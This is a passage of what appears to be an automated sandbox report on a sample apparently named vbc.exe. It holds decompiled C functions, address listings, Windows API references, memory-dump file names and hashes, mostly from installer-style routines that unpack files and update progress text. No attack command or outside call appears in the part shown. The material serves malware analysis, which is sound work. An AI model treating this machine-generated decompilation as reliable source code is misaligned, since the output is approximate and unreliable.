                                                0x00402dbc
                                                0x00402dbc
                                                0x00402dca
                                                0x00402dcc
                                                0x00402dd8
                                                0x00402ddd
                                                0x00402ddf
                                                0x00402ddf
                                                0x00402dea
                                                0x00402dfa
                                                0x00402e0c
                                                0x00402e0c
                                                0x00402e14

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
                                                • wsprintfW.USER32 ref: 00402DEA
                                                • SetWindowTextW.USER32 ref: 00402DFA
                                                • SetDlgItemTextW.USER32 ref: 00402E0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E100022D0(void* __edx) {
                                                				void* _t38;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t42;
                                                				signed int* _t43;
                                                				signed int* _t51;
                                                				void* _t52;
                                                				void* _t54;
                                                
                                                				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                				while(1) {
                                                					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                					_t52 = _t51[6];
                                                					if(_t52 == 0) {
                                                						goto L9;
                                                					}
                                                					_t42 = 0x1a;
                                                					if(_t52 == _t42) {
                                                						goto L9;
                                                					}
                                                					if(_t52 != 0xffffffff) {
                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[6] = _t42;
                                                							goto L12;
                                                						} else {
                                                							_t38 = E100012BA(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t38 = E10001243();
                                                						L11:
                                                						_t52 = _t38;
                                                						L12:
                                                						_t13 =  &(_t51[2]); // 0x1020
                                                						_t43 = _t13;
                                                						if(_t51[1] != 0xffffffff) {
                                                						}
                                                						_t39 =  *_t51;
                                                						_t51[7] = _t51[7] & 0x00000000;
                                                						if(_t39 > 7) {
                                                							L27:
                                                							_t40 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t40;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
                                                								case 0:
                                                									 *_t43 =  *_t43 & 0x00000000;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E10001311(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E10001311(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E1000122C(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if(lstrlenW(__ebp) > 0) {
                                                										__eax = E10001311(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t38 = E1000122C(0x10004044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x100022e4
                                                0x100022e8
                                                0x100022f3
                                                0x100022f3
                                                0x100022fa
                                                0x100022ff
                                                0x00000000
                                                0x00000000
                                                0x10002303
                                                0x10002306
                                                0x00000000
                                                0x00000000
                                                0x1000230b
                                                0x10002316
                                                0x10002326
                                                0x00000000
                                                0x1000231d
                                                0x1000231f
                                                0x10002335
                                                0x00000000
                                                0x10002335
                                                0x1000230d
                                                0x1000230d
                                                0x10002336
                                                0x10002336
                                                0x10002338
                                                0x1000233c
                                                0x1000233c
                                                0x1000233f
                                                0x1000233f
                                                0x10002347
                                                0x10002349
                                                0x10002350
                                                0x10002415
                                                0x10002416
                                                0x10002421
                                                0x1000244b
                                                0x1000244b
                                                0x10002431
                                                0x1000243d
                                                0x10002433
                                                0x10002433
                                                0x10002433
                                                0x00000000
                                                0x10002356
                                                0x10002356
                                                0x00000000
                                                0x1000235d
                                                0x00000000
                                                0x00000000
                                                0x10002366
                                                0x00000000
                                                0x00000000
                                                0x10002374
                                                0x10002376
                                                0x00000000
                                                0x00000000
                                                0x10002397
                                                0x1000239d
                                                0x100023a0
                                                0x100023a2
                                                0x100023b2
                                                0x00000000
                                                0x00000000
                                                0x1000237f
                                                0x10002384
                                                0x10002387
                                                0x10002388
                                                0x00000000
                                                0x00000000
                                                0x100023be
                                                0x100023c4
                                                0x100023c5
                                                0x100023c8
                                                0x100023c9
                                                0x100023cb
                                                0x00000000
                                                0x00000000
                                                0x100023dc
                                                0x100023df
                                                0x100023eb
                                                0x100023ed
                                                0x00000000
                                                0x00000000
                                                0x100023f9
                                                0x10002405
                                                0x10002408
                                                0x1000240a
                                                0x1000240d
                                                0x00000000
                                                0x00000000
                                                0x10002356
                                                0x10002350
                                                0x1000232b
                                                0x10002330
                                                0x00000000
                                                0x10002330

                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E100024A9(intOrPtr* _a4) {
                                                				intOrPtr _v4;
                                                				intOrPtr* _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t35;
                                                				void* _t39;
                                                				intOrPtr _t40;
                                                				void* _t43;
                                                
                                                				_t39 = E1000121B();
                                                				_t24 = _a4;
                                                				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_v4 = _t40;
                                                				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                					}
                                                					_t35 =  *(_t43 - 8);
                                                					if(_t35 <= 7) {
                                                						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
                                                							case 0:
                                                								 *_t39 =  *_t39 & 0x00000000;
                                                								goto L15;
                                                							case 1:
                                                								_push( *__eax);
                                                								goto L13;
                                                							case 2:
                                                								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L14;
                                                							case 3:
                                                								__ecx =  *0x1000406c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x1000406c;
                                                								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                								goto L15;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                								goto L15;
                                                							case 5:
                                                								_push( *0x1000406c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L15;
                                                							case 6:
                                                								_push( *__esi);
                                                								L13:
                                                								__eax = wsprintfW(__edi, __ebp);
                                                								L14:
                                                								__esp = __esp + 0xc;
                                                								goto L15;
                                                						}
                                                					}
                                                					L15:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E100012E1(_t27 - 1, _t39);
                                                								goto L24;
                                                							}
                                                						} else {
                                                							E10001272(_t39);
                                                							L24:
                                                						}
                                                					}
                                                					_v4 = _v4 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_v4 >= 0);
                                                				return GlobalFree(_t39);
                                                			}











                                                0x100024b3
                                                0x100024b5
                                                0x100024c4
                                                0x100024ca
                                                0x100024d7
                                                0x100024d9
                                                0x100024dd
                                                0x100024dd
                                                0x100024e5
                                                0x100024eb
                                                0x100024ed
                                                0x00000000
                                                0x100024f4
                                                0x00000000
                                                0x00000000
                                                0x100024fa
                                                0x00000000
                                                0x00000000
                                                0x10002504
                                                0x00000000
                                                0x00000000
                                                0x1000250b
                                                0x10002511
                                                0x1000251d
                                                0x10002523
                                                0x10002528
                                                0x00000000
                                                0x00000000
                                                0x1000254a
                                                0x00000000
                                                0x00000000
                                                0x10002530
                                                0x10002536
                                                0x10002537
                                                0x10002539
                                                0x00000000
                                                0x00000000
                                                0x10002552
                                                0x10002554
                                                0x10002556
                                                0x10002558
                                                0x10002558
                                                0x00000000
                                                0x00000000
                                                0x100024ed
                                                0x1000255b
                                                0x1000255b
                                                0x10002560
                                                0x10002572
                                                0x10002572
                                                0x10002578
                                                0x1000257d
                                                0x10002582
                                                0x1000258e
                                                0x10002593
                                                0x00000000
                                                0x10002598
                                                0x10002584
                                                0x10002585
                                                0x10002599
                                                0x10002599
                                                0x10002582
                                                0x1000259a
                                                0x1000259e
                                                0x100025a1
                                                0x100025b8

                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalFree.KERNEL32(?), ref: 10002572
                                                • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E004028C3(void* __ebx) {
                                                				void* _t26;
                                                				long _t31;
                                                				void* _t45;
                                                				void* _t49;
                                                				void* _t51;
                                                				void* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                
                                                				_t45 = __ebx;
                                                				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                				_t50 = E00402C53(0xfffffff0);
                                                				 *(_t56 - 0x40) = _t23;
                                                				if(E00405C3D(_t50) == 0) {
                                                					E00402C53(0xffffffed);
                                                				}
                                                				E00405DC2(_t50);
                                                				_t26 = E00405DE7(_t50, 0x40000000, 2);
                                                				 *(_t56 + 8) = _t26;
                                                				if(_t26 != 0xffffffff) {
                                                					_t31 =  *0x42a254;
                                                					 *(_t56 - 0x38) = _t31;
                                                					_t49 = GlobalAlloc(0x40, _t31);
                                                					if(_t49 != _t45) {
                                                						E00403402(_t45);
                                                						E004033EC(_t49,  *(_t56 - 0x38));
                                                						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                						 *(_t56 - 0x50) = _t54;
                                                						if(_t54 != _t45) {
                                                							E0040317B(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                							while( *_t54 != _t45) {
                                                								_t47 =  *_t54;
                                                								_t55 = _t54 + 8;
                                                								 *(_t56 - 0x34) =  *_t54;
                                                								E00405DA2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                								_t54 = _t55 +  *(_t56 - 0x34);
                                                							}
                                                							GlobalFree( *(_t56 - 0x50));
                                                						}
                                                						E00405E99( *(_t56 + 8), _t49,  *(_t56 - 0x38));
                                                						GlobalFree(_t49);
                                                						 *((intOrPtr*)(_t56 - 0x30)) = E0040317B(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                					}
                                                					CloseHandle( *(_t56 + 8));
                                                				}
                                                				_t51 = 0xfffffff3;
                                                				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                					_t51 = 0xffffffef;
                                                					DeleteFileW( *(_t56 - 0x40));
                                                					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                				}
                                                				_push(_t51);
                                                				E00401423();
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t56 - 4));
                                                				return 0;
                                                			}











                                                0x004028c3
                                                0x004028c5
                                                0x004028d1
                                                0x004028d4
                                                0x004028de
                                                0x004028e2
                                                0x004028e2
                                                0x004028e8
                                                0x004028f5
                                                0x004028fd
                                                0x00402900
                                                0x00402906
                                                0x00402914
                                                0x00402919
                                                0x0040291d
                                                0x00402920
                                                0x00402929
                                                0x00402935
                                                0x00402939
                                                0x0040293c
                                                0x00402946
                                                0x00402965
                                                0x0040294d
                                                0x00402952
                                                0x0040295a
                                                0x0040295d
                                                0x00402962
                                                0x00402962
                                                0x0040296c
                                                0x0040296c
                                                0x00402979
                                                0x0040297f
                                                0x00402991
                                                0x00402991
                                                0x00402997
                                                0x00402997
                                                0x004029a2
                                                0x004029a3
                                                0x004029a7
                                                0x004029ab
                                                0x004029b1
                                                0x004029b1
                                                0x004029b8
                                                0x0040224b
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                • GlobalFree.KERNEL32(?), ref: 0040296C
                                                • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                • CloseHandle.KERNEL32(?), ref: 00402997
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404B2D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E00406234(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E00406234(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E00406234(_t44, _t50, 0x423728, 0x423728, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
                                                			}



















                                                0x00404b36
                                                0x00404b3b
                                                0x00404b43
                                                0x00404b44
                                                0x00404b51
                                                0x00404b59
                                                0x00404b5a
                                                0x00404b5c
                                                0x00404b5e
                                                0x00404b60
                                                0x00404b63
                                                0x00404b63
                                                0x00404b6a
                                                0x00404b70
                                                0x00404b70
                                                0x00404b77
                                                0x00404b7e
                                                0x00404b81
                                                0x00404b84
                                                0x00404b84
                                                0x00404b88
                                                0x00404b98
                                                0x00404b9a
                                                0x00404b9d
                                                0x00404b46
                                                0x00404b46
                                                0x00404b4d
                                                0x00404b4d
                                                0x00404ba5
                                                0x00404bb0
                                                0x00404bc6
                                                0x00404bd7
                                                0x00404bf3

                                                APIs
                                                • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                • wsprintfW.USER32 ref: 00404BD7
                                                • SetDlgItemTextW.USER32 ref: 00404BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$(7B
                                                • API String ID: 3540041739-1320723960
                                                • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E004025AE(int __ebx, void* __edx, intOrPtr* __esi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				int _t24;
                                                				signed int _t29;
                                                				intOrPtr* _t32;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t38;
                                                				signed int _t40;
                                                
                                                				_t32 = __esi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x20);
                                                				_t38 = __edx - 0x38;
                                                				 *(_t35 - 0x50) = _t14;
                                                				_t27 = 0 | _t38 == 0x00000000;
                                                				_t29 = _t38 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402C53(0x11)) + _t16;
                                                					} else {
                                                						E00402C53(0x21);
                                                						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp", 0xffffffff, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll", 0x400, __ebx, __ebx);
                                                						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402C31(1);
                                                					 *0x40add8 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t32 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t34 = E00406172(_t27, _t32);
                                                					if((_t29 |  *(_t35 - 0x50)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405EC8(_t34, _t34) >= 0) {
                                                						_t14 = E00405E99(_t34, "C:\Users\Albus\AppData\Local\Temp\nsp5B93.tmp\System.dll",  *(_t35 + 8));
                                                						_t40 = _t14;
                                                						if(_t40 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x004025ae
                                                0x004025ae
                                                0x004025ae
                                                0x004025b3
                                                0x004025b6
                                                0x004025b9
                                                0x004025be
                                                0x004025c0
                                                0x004025e0
                                                0x0040261e
                                                0x004025e2
                                                0x004025e4
                                                0x004025fe
                                                0x00402609
                                                0x00402609
                                                0x004025c2
                                                0x004025c4
                                                0x004025c9
                                                0x004025d7
                                                0x004025da
                                                0x00402623
                                                0x00402626
                                                0x004028a1
                                                0x004028a1
                                                0x0040262c
                                                0x00402635
                                                0x00402637
                                                0x00402656
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402637
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll,00000400,?,?,00000021), ref: 00402609
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
